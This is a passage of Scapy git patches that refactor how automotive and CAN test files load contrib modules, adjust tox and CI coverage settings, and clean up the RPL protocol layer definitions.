lambda iface: CANSocket(bustype='virtual', channel=iface) new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) @@ -91,9 +90,7 @@ s.close() + Basic operations = Load module - -load_contrib("automotive.ccp") -from scapy.contrib.automotive.ccp import CONNECT, DISCONNECT +load_contrib("automotive.ccp", globals_dict=globals()) = Build CRO CONNECT diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index fb6bb51c7db..3dff084c3f9 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -9,16 +9,15 @@ ~ conf command = Load modules - -load_contrib('isotp') -load_contrib("automotive.uds") -load_contrib("automotive.gm.gmlan") -load_layer("can") +load_contrib("isotp", globals_dict=globals()) +load_contrib("automotive.uds", globals_dict=globals()) +load_contrib("automotive.gm.gmlan", globals_dict=globals()) +load_layer("can", globals_dict=globals()) conf.contribs["CAN"]["swap-bytes"] = True = Load ECU module -load_contrib("automotive.ecu") +load_contrib("automotive.ecu", globals_dict=globals()) + Basic checks @@ -230,4 +229,4 @@ assert len([m for m in gmlanmsgs if m.sprintf("%GMLAN.service%") == "ReadDataByI assert len(ecu.log["SecurityAccess"]) == 2 assert len(ecu.log["SecurityAccessPositiveResponse"]) == 2 -assert ecu.log["TransferData"][-1][1][0] == "downloadAndExecuteOrExecute" \ No newline at end of file +assert ecu.log["TransferData"][-1][1][0] == "downloadAndExecuteOrExecute" diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 9415717486d..d4b1747a166 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -4,7 +4,7 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False import subprocess, sys import scapy.modules.six as six @@ -109,15 +109,17 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp") + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - from scapy.contrib.isotp import ISOTPNativeSocket - ISOTPSocket = ISOTPNativeSocket assert ISOTPSocket == ISOTPNativeSocket else: - from scapy.contrib.isotp import ISOTPSoftSocket - ISOTPSocket = ISOTPSoftSocket assert ISOTPSocket == ISOTPSoftSocket ############ @@ -126,8 +128,8 @@ else: = Load contribution layer -load_contrib('automotive.uds') -load_contrib('automotive.ecu') +load_contrib("automotive.uds", globals_dict=globals()) +load_contrib("automotive.ecu", globals_dict=globals()) + Simulator tests diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index cf53321f1b6..3f6140efdc5 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -7,17 +7,14 @@ + Configuration of scapy = Load gmlan layer -~ conf command - -from scapy.contrib.automotive.ecu import ECU - -load_contrib('automotive.gm.gmlan') +~ conf +load_contrib("automotive.ecu", globals_dict=globals()) +load_contrib("automotive.gm.gmlan", globals_dict=globals()) + Basic Packet Tests() = Set GMLAN ECU AddressingScheme conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 2 - assert conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] == 2 = Craft Packet diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index cfeb915452a..919d1c4887c 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -4,7 +4,7 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False import subprocess, sys import scapy.modules.six as six @@ -57,7 +57,6 @@ print("CAN should work now") from scapy.contrib.cansocket_python_can import * -import can as python_can new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface, timeout=0.01) new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) @@ -92,7 +91,6 @@ if "python_can" in CANSocket.__module__: s = new_can_socket(iface0) s.close() - = Check if can-isotp and can-utils are installed on this system ~ linux p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) @@ -109,15 +107,17 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp") + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - from scapy.contrib.isotp import ISOTPNativeSocket - ISOTPSocket = ISOTPNativeSocket assert ISOTPSocket == ISOTPNativeSocket else: - from scapy.contrib.isotp import ISOTPSoftSocket - ISOTPSocket = ISOTPSoftSocket assert ISOTPSocket == ISOTPSoftSocket ############ @@ -126,8 +126,8 @@ else: = Load contribution layer -load_contrib("automotive.gm.gmlan") -load_contrib("automotive.gm.gmlanutils") +load_contrib("automotive.gm.gmlan", globals_dict=globals()) +load_contrib("automotive.gm.gmlanutils", globals_dict=globals()) ############################################################################## + GMLAN_RequestDownload Tests diff --git a/test/contrib/automotive/obd/obd.uts b/test/contrib/automotive/obd/obd.uts index f04fa89a0c8..17f3df69a82 100644 --- a/test/contrib/automotive/obd/obd.uts +++ b/test/contrib/automotive/obd/obd.uts @@ -9,9 +9,7 @@ + Basic operations = Load module - -load_contrib("automotive.obd.obd") - +load_contrib("automotive.obd.obd", globals_dict=globals()) = Check if positive response answers diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 02b841355dc..8b89d263293 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -4,7 +4,7 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False import subprocess, sys import scapy.modules.six as six @@ -57,7 +57,6 @@ print("CAN should work now") from scapy.contrib.cansocket_python_can import * -import can as python_can new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) @@ -107,15 +106,17 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp") + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - from scapy.contrib.isotp import ISOTPNativeSocket - ISOTPSocket = ISOTPNativeSocket assert ISOTPSocket == ISOTPNativeSocket else: - from scapy.contrib.isotp import ISOTPSoftSocket - ISOTPSocket = ISOTPSoftSocket assert ISOTPSocket == ISOTPSoftSocket ############ @@ -123,16 +124,15 @@ else: + Load general modules = Load contribution layer - -load_contrib('automotive.obd.obd') +load_contrib("automotive.obd.obd", globals_dict=globals()) + Load OBD_scan = imports from subprocess import call -from scapy.contrib.automotive.obd.scanner import * -from scapy.contrib.automotive.ecu import * +load_contrib("automotive.obd.scanner", globals_dict=globals()) +load_contrib("automotive.ecu", globals_dict=globals()) = Create answers diff --git a/test/contrib/automotive/someip.uts b/test/contrib/automotive/someip.uts index 375b17e39e0..91fb8efdace 100644 --- a/test/contrib/automotive/someip.uts +++ b/test/contrib/automotive/someip.uts @@ -32,7 +32,7 @@ + Basic operations = Load module -load_contrib("automotive.someip") +load_contrib("automotive.someip", globals_dict=globals()) + SOME/IP operation diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 51d0a840ec4..9105c0bd54b 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -9,10 +9,8 @@ + Basic operations = Load module - -load_contrib("automotive.uds") - -from scapy.contrib.automotive.ecu import ECU +load_contrib("automotive.uds", globals_dict=globals()) +load_contrib("automotive.ecu", globals_dict=globals()) = Check if positive response answers diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 735d45aad5b..0d8cb162ec7 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -4,7 +4,7 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False import subprocess, sys import scapy.modules.six as six @@ -108,15 +108,17 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp") + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - from scapy.contrib.isotp import ISOTPNativeSocket - ISOTPSocket = ISOTPNativeSocket assert ISOTPSocket == ISOTPNativeSocket else: - from scapy.contrib.isotp import ISOTPSoftSocket - ISOTPSocket = ISOTPSoftSocket assert ISOTPSocket == ISOTPSoftSocket ############ @@ -124,8 +126,7 @@ else: + Load general modules = Load contribution layer -load_contrib('automotive.uds') - +load_contrib("automotive.uds", globals_dict=globals()) = Test Session Enumerator drain_bus(iface0) diff --git a/test/contrib/cansocket.uts b/test/contrib/cansocket.uts index 4d649c696e2..e227e5437f7 100644 --- a/test/contrib/cansocket.uts +++ b/test/contrib/cansocket.uts @@ -10,20 +10,16 @@ ~ conf = Load module - -load_layer("can") +load_layer("can", globals_dict=globals()) from scapy.contrib.cansocket_python_can import PythonCANSocket from scapy.contrib.cansocket_native import NativeCANSocket conf.contribs['CAN'] = {'swap-bytes': False} = Setup string for vcan -~ conf command - bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" = Load os - import os import threading from subprocess import call diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index fa504850342..865113cbfd6 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -7,48 +7,37 @@ ############ ############ + Configuration of CAN virtual sockets +~ conf = Load module -~ conf command needs_root linux - -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CANSocket'] = {'use-python-can': False} from scapy.contrib.cansocket_native import * conf.contribs['CAN'] = {'swap-bytes': False} = Setup string for vcan -~ conf command - bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" +bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" = Load os -~ conf command needs_root linux - import os import threading from time import sleep from subprocess import call = Setup vcan0 -~ conf command needs_root linux - 0 == os.system(bashCommand) + Basic Packet Tests() = CAN Packet init - - canframe = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') bytes(canframe) == b'\x00\x00\x07\xff\x08\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08' + Basic Socket Tests() = CAN Socket Init - - sock1 = CANSocket(channel="vcan0") = CAN Socket send recv small packet - def sender(): sleep(0.1) sock2 = CANSocket(channel="vcan0") @@ -62,8 +51,6 @@ rx == CAN(identifier=0x7ff,length=1,data=b'\x01') thread.join(timeout=5) = CAN Socket send recv - - def sender(): sleep(0.1) sock2 = CANSocket(channel="vcan0") @@ -77,8 +64,6 @@ rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') thread.join(timeout=5) = CAN Socket basecls test - - def sender(): sleep(0.1) sock2 = CANSocket(channel="vcan0") @@ -95,13 +80,9 @@ thread.join(timeout=5) + Advanced Socket Tests() = CAN Socket sr1 - - tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') = CAN Socket sr1 init time - - tx.sent_time == None def sender(): @@ -120,18 +101,12 @@ sock1.close() thread.join(timeout=5) = CAN Socket sr1 time check - - assert tx.sent_time < rx.time and rx.time > 0 = sr can - - tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') = sr can check init time - - assert tx.sent_time == None def sender(): diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index 658ec49302b..0e1a8bc4171 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -9,13 +9,12 @@ + Configuration of CAN virtual sockets = Load module -~ conf command - +~ conf + conf.contribs['CAN'] = {'swap-bytes': False} -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CANSocket'] = {'use-python-can': True} from scapy.contrib.cansocket_python_can import * -import can = Setup string for vcan ~ conf command diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 1da5543a7e9..cb3a0e0ce5d 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -4,7 +4,7 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False import scapy.modules.six as six import subprocess, sys @@ -140,7 +140,7 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} -load_contrib("isotp") +load_contrib("isotp", globals_dict=globals()) ISOTPSocket = ISOTPSoftSocket diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index b77606cc0f1..dcc9bc84bf2 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -4,7 +4,7 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False import os, subprocess, sys from subprocess import call @@ -110,15 +110,17 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp") + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - from scapy.contrib.isotp import ISOTPNativeSocket - ISOTPSocket = ISOTPNativeSocket assert ISOTPSocket == ISOTPNativeSocket else: - from scapy.contrib.isotp import ISOTPSoftSocket - ISOTPSocket = ISOTPSoftSocket assert ISOTPSocket == ISOTPSoftSocket diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 7a5e5e52db4..746af908c39 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -6,7 +6,8 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) + import threading, subprocess, sys import scapy.modules.six as six from subprocess import call @@ -100,7 +101,7 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} -load_contrib("isotp") +load_contrib("isotp", globals_dict=globals()) ISOTPSocket = ISOTPSoftSocket diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index c86d3f6dd46..a1a76534792 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -5,10 +5,10 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) +import scapy.modules.six as six import subprocess, sys from subprocess import call -import scapy.modules.six as six from scapy.contrib.automotive.ecu import * = Definition of constants, utility functions and mock classes @@ -104,18 +104,19 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): = Import isotp conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp") + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - from scapy.contrib.isotp import ISOTPNativeSocket - ISOTPSocket = ISOTPNativeSocket assert ISOTPSocket == ISOTPNativeSocket else: - from scapy.contrib.isotp import ISOTPSoftSocket - ISOTPSocket = ISOTPSoftSocket assert ISOTPSocket == ISOTPSoftSocket - + Usage tests = Test wrong usage diff --git a/test/windows.uts b/test/windows.uts index b4298cf9aa2..4754ad1867b 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -2,6 +2,12 @@ # More information at http://www.secdev.org/projects/UTscapy/ ++ Configuration + += Imports + +import mock + ############ ############ + Mechanics tests From 0418b71cfc98bfb27cae7a93a854028e1e3e5e8b Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 31 May 2020 17:37:39 +0200 Subject: [PATCH 0184/1632] Remove tag random_weird_py3 since it's not used in any *.uts file --- tox.ini | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/tox.ini b/tox.ini index 9eb37fff11e..43cbf19ab35 100644 --- a/tox.ini +++ b/tox.ini @@ -28,11 +28,11 @@ platform = bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd windows: win32 commands = - linux_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 -N {posargs} - linux_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs} - bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -K random_weird_py3 -N {posargs} - bsd_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -K random_weird_py3 {posargs} - windows: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc -K random_weird_py3 {posargs} + linux_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} + linux_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} + bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} + bsd_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} + windows: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} coverage combine # Variants of the main tests @@ -54,7 +54,7 @@ commands = bash -c "cd /tmp/can-isotp; make; sudo make modules_install; sudo modprobe can_isotp || sudo insmod ./net/can/can-isotp.ko" bash -c "rm -rf /tmp/can-utils /tmp/can-isotp" lsmod - sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs} + sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} coverage combine # Specific functions or tests From 34fdc8c0cd054ce612c3eb61b6485aa4df92bfae Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 2 Jun 2020 11:22:13 +0200 Subject: [PATCH 0185/1632] Specify the coverage result file --- .github/workflows/unittests.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 71cd7e04dee..59bd578fcb1 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -70,3 +70,5 @@ jobs: run: ./.config/ci/test.sh ${{ matrix.python }} non_root - name: Codecov uses: codecov/codecov-action@v1 + with: + file: /home/runner/work/scapy/scapy/.coverage From 9b375485932f0d4e86ec798d556ccd58440b6de9 Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Tue, 2 Jun 2020 18:37:58 +0800 Subject: [PATCH 0186/1632] removed guess_payload_class; using bind_layers; removed overload_fields; updated unit tests; fixed pylint docstring issues --- scapy/contrib/rpl.py | 208 +++++++++++++++++++---------------- scapy/contrib/rpl_metrics.py | 127 +++++++++++++-------- scapy/layers/inet6.py | 26 ++--- test/contrib/rpl.uts | 18 ++- 4 files changed, 218 insertions(+), 161 deletions(-) diff --git a/scapy/contrib/rpl.py b/scapy/contrib/rpl.py index 9be7ee15fbf..efb74847056 100644 --- a/scapy/contrib/rpl.py +++ b/scapy/contrib/rpl.py @@ -20,15 +20,19 @@ # scapy.contrib.description = Routing Protocol for LLNs (RPL) # scapy.contrib.status = loads -from scapy.packet import Packet +""" +RFC 6550 - Routing Protocol for Low-Power and Lossy Networks (RPL) +draft-ietf-roll-efficient-npdao-17 - Efficient Route Invalidation +""" + +from scapy.packet import Packet, bind_layers from scapy.fields import ByteEnumField, ByteField, IP6Field, ShortField, \ - XShortField, BitField, BitEnumField, FieldLenField, StrLenField, IntField -from scapy.layers.inet6 import icmp6rplcodes, RPL, icmp6ndraprefs, \ - _IP6PrefixField + BitField, BitEnumField, FieldLenField, StrLenField, IntField +from scapy.layers.inet6 import RPL, icmp6ndraprefs, _IP6PrefixField # https://www.iana.org/assignments/rpl/rpl.xhtml#mop -rplmop = {0: "No Downward routes", +RPLMOP = {0: "No Downward routes", 1: "Non-Storing", 2: "Storing with no multicast support", 3: "Storing with multicast support", @@ -36,7 +40,7 @@ # https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options -rploptsstr = {0: "Pad1", +RPLOPTSSTR = {0: "Pad1", 1: "PadN", 2: "DAG Metric Container", 3: "Routing Information", @@ -49,21 +53,16 @@ 10: "P2P Route Discovery"} -rplopts = { -} - - -class RPLGuessOption: +class _RPLGuessOption(Packet): name = "Dummy RPL Option class that implements guess_payload_class()" - def guess_payload_class(self, p): - if len(p) > 0: - return rplopts.get(ord(p[0])) - -class OptRIO(Packet): +class OptRIO(_RPLGuessOption): + """ + Control Option: Routing Information Option (RIO) + """ name = "Routing Information" - fields_desc = [ByteEnumField("otype", 3, rploptsstr), + fields_desc = [ByteEnumField("otype", 3, RPLOPTSSTR), FieldLenField("len", None, length_of="prefix", fmt="B", adjust=lambda pkt, x: x + 6), ByteField("plen", None), @@ -74,9 +73,12 @@ class OptRIO(Packet): _IP6PrefixField("prefix", None)] -class OptDODAGConfig(Packet): +class OptDODAGConfig(_RPLGuessOption): + """ + Control Option: DODAG Configuration + """ name = "DODAG Configuration" - fields_desc = [ByteEnumField("otype", 4, rploptsstr), + fields_desc = [ByteEnumField("otype", 4, RPLOPTSSTR), ByteField("len", 14), BitField("flags", 0, 4), BitField("A", 0, 1), @@ -92,19 +94,25 @@ class OptDODAGConfig(Packet): ShortField("LifetimeUnit", 0xffff)] -class OptTgt(Packet): +class OptTgt(_RPLGuessOption): + """ + Control Option: RPL Target + """ name = "RPL Target" - fields_desc = [ByteEnumField("otype", 5, rploptsstr), + fields_desc = [ByteEnumField("otype", 5, RPLOPTSSTR), FieldLenField("len", None, length_of="prefix", fmt="B", adjust=lambda pkt, x: x + 2), ByteField("flags", 0), - ByteField("plen", None), + ByteField("plen", 0), _IP6PrefixField("prefix", None)] -class OptTIO(Packet): +class OptTIO(_RPLGuessOption): + """ + Control Option: Transit Information Option (TIO) + """ name = "Transit Information" - fields_desc = [ByteEnumField("otype", 6, rploptsstr), + fields_desc = [ByteEnumField("otype", 6, RPLOPTSSTR), FieldLenField("len", None, length_of="parentaddr", fmt="B", adjust=lambda pkt, x: x + 4), BitField("E", 0, 1), @@ -115,9 +123,12 @@ class OptTIO(Packet): _IP6PrefixField("parentaddr", None)] -class OptSolInfo(Packet): +class OptSolInfo(_RPLGuessOption): + """ + Control Option: Solicited Information + """ name = "Solicited Information" - fields_desc = [ByteEnumField("otype", 7, rploptsstr), + fields_desc = [ByteEnumField("otype", 7, RPLOPTSSTR), ByteField("len", 19), ByteField("RPLInstanceID", 0), BitField("V", 0, 1), @@ -128,9 +139,12 @@ class OptSolInfo(Packet): ByteField("ver", 0)] -class OptPIO(Packet): +class OptPIO(_RPLGuessOption): + """ + Control Option: Prefix Information Option (PIO) + """ name = "Prefix Information" - fields_desc = [ByteEnumField("otype", 8, rploptsstr), + fields_desc = [ByteEnumField("otype", 8, RPLOPTSSTR), ByteField("len", 30), ByteField("plen", 64), BitField("L", 0, 1), @@ -143,68 +157,74 @@ class OptPIO(Packet): IP6Field("prefix", "::1")] -class OptTgtDesc(Packet): +class OptTgtDesc(_RPLGuessOption): + """ + Control Option: RPL Target Descriptor + """ name = "RPL Target Descriptor" - fields_desc = [ByteEnumField("otype", 9, rploptsstr), + fields_desc = [ByteEnumField("otype", 9, RPLOPTSSTR), ByteField("len", 4), IntField("descriptor", 0)] -class Pad1(Packet): +class Pad1(_RPLGuessOption): + """ + Control Option: Pad 1 byte + """ name = "Pad1" - fields_desc = [ByteEnumField("otype", 0x00, rploptsstr)] - - def alignment_delta(self, curpos): # No alignment requirement - return 0 + fields_desc = [ByteEnumField("otype", 0x00, RPLOPTSSTR)] - def extract_padding(self, p): - return b"", p - -class PadN(Packet): +class PadN(_RPLGuessOption): + """ + Control Option: Pad N bytes + """ name = "PadN" - fields_desc = [ByteEnumField("otype", 0x01, rploptsstr), + fields_desc = [ByteEnumField("otype", 0x01, RPLOPTSSTR), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] - def alignment_delta(self, curpos): # No alignment requirement - return 0 - - def extract_padding(self, p): - return b"", p - # RPL Control Message Handling -class DIS(RPLGuessOption, Packet): +class DIS(_RPLGuessOption, Packet): + """ + Control Message: DODAG Information Solicitation (DIS) + """ name = "DODAG Information Solicitation" - fields_desc = [XShortField("cksum", None), - # DIS Base Object - ByteField("flags", 0), + fields_desc = [ByteField("flags", 0), ByteField("reserved", 0)] -class DIO(RPLGuessOption, Packet): +class DIO(_RPLGuessOption, Packet): + """ + Control Message: DODAG Information Object (DIO) + """ name = "DODAG Information Object" - fields_desc = [XShortField("cksum", None), - # DIO Base Object - ByteField("RPLInstanceID", 50), + fields_desc = [ByteField("RPLInstanceID", 50), ByteField("ver", 0), ShortField("rank", 1), BitField("G", 1, 1), BitField("unused1", 0, 1), - BitEnumField("mop", 1, 3, rplmop), + BitEnumField("mop", 1, 3, RPLMOP), BitField("prf", 0, 3), ByteField("dtsn", 240), ByteField("flags", 0), ByteField("reserved", 0), IP6Field("dodagid", "::1")] - overload_fields = {RPL: {"code": 1}} class _OptDODAGIDField(IP6Field): + """ + Handle Optional DODAG ID field in DAO + """ + def getfield(self, pkt, s): + if pkt.D == 0: + return s, None + return s[16:], self.m2i(pkt, s[:16]) + def addfield(self, pkt, s, val): if pkt.D == 1: return s + self.i2m(pkt, val) @@ -213,82 +233,80 @@ def addfield(self, pkt, s, val): return s -class DAO(RPLGuessOption, Packet): +class DAO(_RPLGuessOption, Packet): + """ + Control Message: Destination Advertisement Object (DAO) + """ name = "Destination Advertisement Object" - fields_desc = [XShortField("cksum", None), - # Base Object - ByteField("RPLInstanceID", 50), + fields_desc = [ByteField("RPLInstanceID", 50), BitField("K", 0, 1), BitField("D", 0, 1), BitField("flags", 0, 6), ByteField("reserved", 0), ByteField("daoseq", 1), _OptDODAGIDField("dodagid", None)] - overload_fields = {RPL: {"code": 2}} -class DAOACK(RPLGuessOption, Packet): +class DAOACK(_RPLGuessOption, Packet): + """ + Control Message: Destination Advertisement Object Acknowledgement (DAOACK) + """ name = "Destination Advertisement Object Acknowledgement" - fields_desc = [XShortField("cksum", None), - # Base Object - ByteField("RPLInstanceID", 50), + fields_desc = [ByteField("RPLInstanceID", 50), BitField("D", 0, 1), BitField("reserved", 0, 7), ByteField("daoseq", 1), ByteField("status", 0), _OptDODAGIDField("dodagid", None)] - overload_fields = {RPL: {"code": 3}} # https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ -class DCO(RPLGuessOption, Packet): +class DCO(_RPLGuessOption, Packet): + """ + Control Message: Destination Cleanup Object (DCO) + """ name = "Destination Cleanup Object" - fields_desc = [XShortField("cksum", None), - # Base Object - ByteField("RPLInstanceID", 50), + fields_desc = [ByteField("RPLInstanceID", 50), BitField("K", 0, 1), BitField("D", 0, 1), BitField("flags", 0, 6), ByteField("status", 0), ByteField("dcoseq", 1), _OptDODAGIDField("dodagid", None)] - overload_fields = {RPL: {"code": 7}} # https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ -class DCOACK(RPLGuessOption, Packet): +class DCOACK(_RPLGuessOption, Packet): + """ + Control Message: Destination Cleanup Object Acknowledgement (DCOACK) + """ name = "Destination Cleanup 